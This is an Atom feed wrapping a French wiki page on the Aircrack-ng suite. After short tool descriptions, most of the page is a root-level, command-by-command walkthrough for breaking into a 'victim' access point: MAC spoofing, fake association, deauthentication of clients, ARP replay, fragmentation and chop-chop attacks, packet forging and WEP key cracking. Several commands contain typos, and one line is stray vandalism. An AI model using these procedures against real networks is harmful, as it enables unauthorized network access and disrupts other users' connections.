<?xml version="1.0"?>
<?xml-stylesheet type="text/css" href="http://hack-it.org/skins/common/feed.css?207"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>http://hack-it.org/index.php?feed=atom&amp;target=83.113.245.241&amp;title=Sp%C3%A9cial%3AContributions</id>
		<title>Hack-it.org - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="http://hack-it.org/index.php?feed=atom&amp;target=83.113.245.241&amp;title=Sp%C3%A9cial%3AContributions"/>
		<link rel="alternate" type="text/html" href="http://hack-it.org/index.php?title=Sp%C3%A9cial:Contributions/83.113.245.241"/>
		<updated>2026-04-18T14:50:11Z</updated>
		<subtitle>De Hack-it.org.</subtitle>
		<generator>MediaWiki 1.15.1</generator>

	<entry>
		<id>http://hack-it.org/index.php?title=Aircrack-ng</id>
		<title>Aircrack-ng</title>
		<link rel="alternate" type="text/html" href="http://hack-it.org/index.php?title=Aircrack-ng"/>
				<updated>2009-12-27T20:01:20Z</updated>
		
		<summary type="html">&lt;p&gt;83.113.245.241&amp;nbsp;:&amp;#32;/* airbase-ng */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Les outils de la suite aircrack ==&lt;br /&gt;
&lt;br /&gt;
=== aircrack-ng ===&lt;br /&gt;
Sert à casser la clé WEP, depuis la derniere version, il utilise l'algorythme PTW par défaut.&lt;br /&gt;
&lt;br /&gt;
=== airbase-ng ===&lt;br /&gt;
Sert à simuler un point d'accès afin d'attaquer le client qui se connectera au &amp;quot;fake-ap&amp;quot;.&lt;br /&gt;
osar the best&lt;br /&gt;
&lt;br /&gt;
=== airdecap-ng ===&lt;br /&gt;
Sert à déchiffrer un fichier pcap (.cap) à l'aide de la clé WEP/WPA si nécessaire, afin de pouvoir consulter les paquets à l'aide d'un logiciel tel que wireshark.&lt;br /&gt;
&lt;br /&gt;
=== airdecloak-ng ===&lt;br /&gt;
Sert à décloaker (démasquer) les bssid cloakés&lt;br /&gt;
&lt;br /&gt;
=== airdriver-ng ===&lt;br /&gt;
Sert à compiler, dés/installer les drivers appropriés à votre carte.&lt;br /&gt;
&lt;br /&gt;
=== aireplay-ng ===&lt;br /&gt;
Sert à injecter des paquets et à s'authentifier auprès des AP.&lt;br /&gt;
&lt;br /&gt;
=== airmon-ng ===&lt;br /&gt;
Sert à dés/activer le mode monitor sur votre carte.&lt;br /&gt;
&lt;br /&gt;
=== airodump-ng ===&lt;br /&gt;
Sert à rechercher des AP cibles et de voir les stations associées aux AP. Permet également de capturer les paquets lors de l'attaque.&lt;br /&gt;
&lt;br /&gt;
=== airserv-ng ===&lt;br /&gt;
Serveur pour carte WiFi. Permet à plusieurs applications sans fil d'utiliser indépendament la carte via une connection TCP de type client-serveur.&lt;br /&gt;
&lt;br /&gt;
=== airolib-ng ===&lt;br /&gt;
Permet de créer une base de données sqlite en vue d'un crack WPA.&lt;br /&gt;
&amp;lt;br /&amp;gt;'''ATTENTION: Pour fonctionner, vous devez avoir compilé aircrack avec le support pour sqlite.'''&lt;br /&gt;
&lt;br /&gt;
=== airtun-ng ===&lt;br /&gt;
&lt;br /&gt;
=== buddy-ng ===&lt;br /&gt;
A utiliser avec easside-ng&lt;br /&gt;
&lt;br /&gt;
=== easside-ng ===&lt;br /&gt;
Outil &amp;quot;auto-magic&amp;quot; permettant de communiquer avec un AP utilisant le chiffrement WEP sans en connaitre la clé.&lt;br /&gt;
&lt;br /&gt;
=== ivstools ===&lt;br /&gt;
Permet d'extraire les IVs d'un fichier pcap, ou bien de rassembler plusieurs fichiers .ivs en un seul.&lt;br /&gt;
&lt;br /&gt;
=== makeivs ===&lt;br /&gt;
Permet de créer un fichier .ivs à partir d'une clé WEP connue.&lt;br /&gt;
&lt;br /&gt;
=== packetforge-ng ===&lt;br /&gt;
Sert à forger des paquets de différents types (le plus souvent un ARP en vue d'une injection).&lt;br /&gt;
&lt;br /&gt;
=== tkiptun-ng ===&lt;br /&gt;
Permet d'aider au crack de clés WPA utilisant TKIP.&lt;br /&gt;
&amp;lt;br /&amp;gt;'''ATTENTION: Cet outil n'est pas encore fonctionnel.'''&lt;br /&gt;
&lt;br /&gt;
=== wesside-ng ===&lt;br /&gt;
Outil permettant l'automatisation du crack de clé WEP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&amp;lt;big&amp;gt;&amp;lt;u&amp;gt;'''TOUTES LES COMMANDES CI-DESSOUS SONT A EFFECTUER EN ROOT'''&amp;lt;/u&amp;gt;&amp;lt;/big&amp;gt;&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Les drivers WiFi ==&lt;br /&gt;
Pour charger, décharger ou compiler des drivers, utiliser airdriver-ng.&lt;br /&gt;
* Pour connaitre les drivers supportés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng supported&lt;br /&gt;
&lt;br /&gt;
* Pour connaitre les drivers déjà installés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aidriver-ng installed&lt;br /&gt;
&lt;br /&gt;
* Pour connaitre les drivers WiFi chargés dans le kernel:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng loaded&lt;br /&gt;
&lt;br /&gt;
* Pour détecter les cartes WiFi:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng detect&lt;br /&gt;
&lt;br /&gt;
* Pour décharger un driver inutile:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng unload $num_driver&lt;br /&gt;
&lt;br /&gt;
* Pour compiler un driver:&lt;br /&gt;
Récupérer les sources du kernel, s'assurer d'avoir les outils de compilation classiques installés, puis taper:&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt; airdriver-ng compile $num_driver&lt;br /&gt;
&lt;br /&gt;
* Pour installer un driver fraichement compilé:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng install $num_driver&lt;br /&gt;
&lt;br /&gt;
* Pour charger un driver dans le kernel:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng load $num_driver&lt;br /&gt;
&lt;br /&gt;
* Pour avoir des détails sur un driver:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng details $num_driver&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les différents types d'attaques ==&lt;br /&gt;
Dans les cas où l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type &amp;quot;macchanger --mac $mac $iface&amp;quot;, et relancer la carte.&lt;br /&gt;
&lt;br /&gt;
=== Légende ===&lt;br /&gt;
$iface : interface correspondant à la carte WiFi (wlan0, rausb0, mon0 ou autre)&lt;br /&gt;
&amp;lt;br /&amp;gt;$canal = canal wifi à utiliser (colonne &amp;quot;CH&amp;quot; dans airodump-ng)&lt;br /&gt;
&amp;lt;br /&amp;gt;$bssid_cible = BSSID du point d'acces ciblé&lt;br /&gt;
&amp;lt;br /&amp;gt;$essid_cible = ESSID du point d'acces ciblé (peut parfois etre masqué)&lt;br /&gt;
&amp;lt;br /&amp;gt;$mac_carte = adresse MAC de la carte wifi (peut etre la meme que celle d'un client connecté en cas de MAC spoofing)&lt;br /&gt;
&amp;lt;br /&amp;gt;$mac_client = adresse MAC du client associé au point d'acces ciblé (colonne &amp;quot;STATION&amp;quot; dans airodump-ng)&lt;br /&gt;
&lt;br /&gt;
=== Mac spoofing ===&lt;br /&gt;
Pour les procédures ci-dessous, dans les cas où l'association ne fonctionne pas, il faut couper la carte et changer l'adresse mac de la carte par celle d'un client connecté à la station, et relancer la carte:&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt; ifconfig $iface down&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt;macchanger --mac $mac_client $iface&lt;br /&gt;
&lt;br /&gt;
=== Méthode &amp;quot;ARP replay&amp;quot; ===&lt;br /&gt;
'''Méthode avec client et sans filtrage MAC'''&lt;br /&gt;
* Mettre carte en monitor:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; ifconfig $iface down&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt; airmon-ng start $iface&lt;br /&gt;
&lt;br /&gt;
* Trouver une victime:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;''Couper une fois la victime trouvée''&lt;br /&gt;
&lt;br /&gt;
* Lancer la capture d'IVs:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng -c $canal -w $fichier_capture $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = préfixe à utiliser pour le nom du fichier de capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''Laisser tourner...''&lt;br /&gt;
&lt;br /&gt;
* Associer la carte à l'AP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 30 -e $essid_cible -a $bssid_cible -h $mac_client $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-1 = fake association&lt;br /&gt;
&amp;lt;br /&amp;gt;30 = temps d'attente entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;''En cas de succes, &amp;quot;Association successful :-)&amp;quot; doit s'afficher''&lt;br /&gt;
&lt;br /&gt;
* Lancer l'injection:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -3 -e $essid_cible -a $bssid_cible -h $mac_client $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-3 = attaque ARP replay&lt;br /&gt;
&amp;lt;br /&amp;gt;''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente''&lt;br /&gt;
&lt;br /&gt;
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aircrack-ng $fichier_capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''CRACKED !!!''&lt;br /&gt;
&lt;br /&gt;
=== Methode &amp;quot;chop-chop&amp;quot; et &amp;quot;par fragmentation&amp;quot; ===&lt;br /&gt;
'''Méthodes avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''&lt;br /&gt;
* Mettre la carte en monitor:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; ifconfig $iface down&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt; airmon-ng start $iface&lt;br /&gt;
&lt;br /&gt;
* Trouver une victime:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodum-ng $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;''Couper une fois la victime trouvée''&lt;br /&gt;
&lt;br /&gt;
* Lancer la capture d'IVs:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodum-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = préfice à utiliser pour le nom du fichier de capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''Laisser tourner...''&lt;br /&gt;
&lt;br /&gt;
* Associer la carte à l'AP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-1 = fake association&lt;br /&gt;
&amp;lt;br /&amp;gt;0 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;''En cas de succes, &amp;quot;Association successful :-)&amp;quot; doit s'afficher''&lt;br /&gt;
** En cas d'échec:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;6000 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;-o = nombre de jeux de paquets à envoyer à la fois&lt;br /&gt;
&amp;lt;br /&amp;gt;-q = intervale entre 2 paquets &amp;quot;keep-alive&amp;quot;&lt;br /&gt;
** En cas de filtrage MAC:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -0 1 -a $bssid_cible -c $mac_client $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-0 = déauthentification&lt;br /&gt;
&amp;lt;br /&amp;gt;1 = nombre de deauth à envoyer à la fois (0 -&amp;gt; indéfiniment)&lt;br /&gt;
&amp;lt;br /&amp;gt;-c = client à déauthentifier (si pas spécifié, les deauth sont envoyés à tous les clients connectés à l'AP&lt;br /&gt;
&amp;lt;br /&amp;gt;''Vérifier dans airodump-ng si le client est bien déauthentifié, sinon recommencer, et envoyer plus de deauths à la fois si besoin''&lt;br /&gt;
&lt;br /&gt;
* Attaque:&lt;br /&gt;
Ces 2 attaques permettent d'obtenir un PRGA (Pseudo Random Generation Algorythme) afin de créer un paquet ARP à injecter. Si l'attaque par fragmentation ne donne rien, on tentera la méthode chop-chop.&lt;br /&gt;
&amp;lt;br /&amp;gt;Dans les 2 cas, un fichier .xor sera créé en cas de succès.&lt;br /&gt;
** Par fragmentation:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -5 -b $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-5 = attaque par fragmentation&lt;br /&gt;
** Chop-chop:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -4 -b $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-4 = attaque chop-chop&lt;br /&gt;
&lt;br /&gt;
* Création d'un paquet ARP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; packetforge-ng -0 -a $bssid_cible -h mac_carte -k 255.255.255.255 -l 255.255.255.255 -y $fichier_xor -w $fichier_arp&lt;br /&gt;
&amp;lt;br /&amp;gt;-0 = générer un paquet ARP&lt;br /&gt;
&amp;lt;br /&amp;gt;-k = IP de destination (la plupart des AP répondent au 255.255.255.255)&lt;br /&gt;
&amp;lt;br /&amp;gt;-l = IP source (la plupart des AP répondent au 255.255.255.255)&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = nom du fichier dans lequel mettre le paquet ARP&lt;br /&gt;
&lt;br /&gt;
* Injection de l'ARP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -2 -r $fichier_arp $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-2 = selection de paquets interactive (accepter le paquet avec &amp;quot;y&amp;quot;)&lt;br /&gt;
&amp;lt;br /&amp;gt;''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''&lt;br /&gt;
&lt;br /&gt;
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aircrack-ng $fichier_capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''CRACKED''&lt;br /&gt;
&lt;br /&gt;
=== Méthode &amp;quot;-p 0841&amp;quot; ===&lt;br /&gt;
'''Méthode avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''&lt;br /&gt;
* Mettre la carte en mode monitor:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; ifconfig $iface down&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airmon-ng start $iface&lt;br /&gt;
&lt;br /&gt;
* Trouver une victime:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;''Couper une fois la victime trouvée''&lt;br /&gt;
&lt;br /&gt;
* Lancer la capture d'IVs:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = préfixe à utiliser pour le nom du fichier de capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''Laisser tourner...''&lt;br /&gt;
&lt;br /&gt;
* Associer la carte à la station:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-1 = fake association&lt;br /&gt;
&amp;lt;br /&amp;gt;0 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;''En cas de succès, &amp;quot;Association successful :-)&amp;quot; doit s'afficher&lt;br /&gt;
** En cas d'échec:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;6000 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;-o = nombre de jeux de paquets à envoyer à la fois&lt;br /&gt;
&amp;lt;br /&amp;gt;-q = intervale entre 2 paquets &amp;quot;keep-alive&amp;quot;&lt;br /&gt;
** En cas de filtrage MAC:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -0 1 -a $bssid_cible -c $mac_client $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-0 = déauthentification&lt;br /&gt;
&amp;lt;br /&amp;gt;1 = nombre de deauth à envoyer à la fois (0 -&amp;gt; indéfiniment)&lt;br /&gt;
&amp;lt;br /&amp;gt;-c = client à déauthentifier (si pas spécifié, les deauth sont envoyés à tous les clients connectés à l'AP&lt;br /&gt;
&amp;lt;br /&amp;gt;''Vérifier dans airodump-ng si le client est bien déauthentifié, sinon recommencer, et envoyer plus de deauths à la fois si besoin''&lt;br /&gt;
&lt;br /&gt;
* Lancer l'injection:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-2 = sélection de paquets interactive (accepter le paquet avec &amp;quot;y&amp;quot;)&lt;br /&gt;
&amp;lt;br /&amp;gt;-c = considérer l'adresse MAC de l'AP comme une adresse broadcast, force l'AP à renvoyer des paquets&lt;br /&gt;
&amp;lt;br /&amp;gt;''Surveiller la colonne #Data (correspond aux IVs) dans airodump-ng, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''&lt;br /&gt;
&lt;br /&gt;
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aircrack-ng $fichier_capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''CRACKED''&lt;/div&gt;</summary>
		<author><name>83.113.245.241</name></author>	</entry>

	</feed>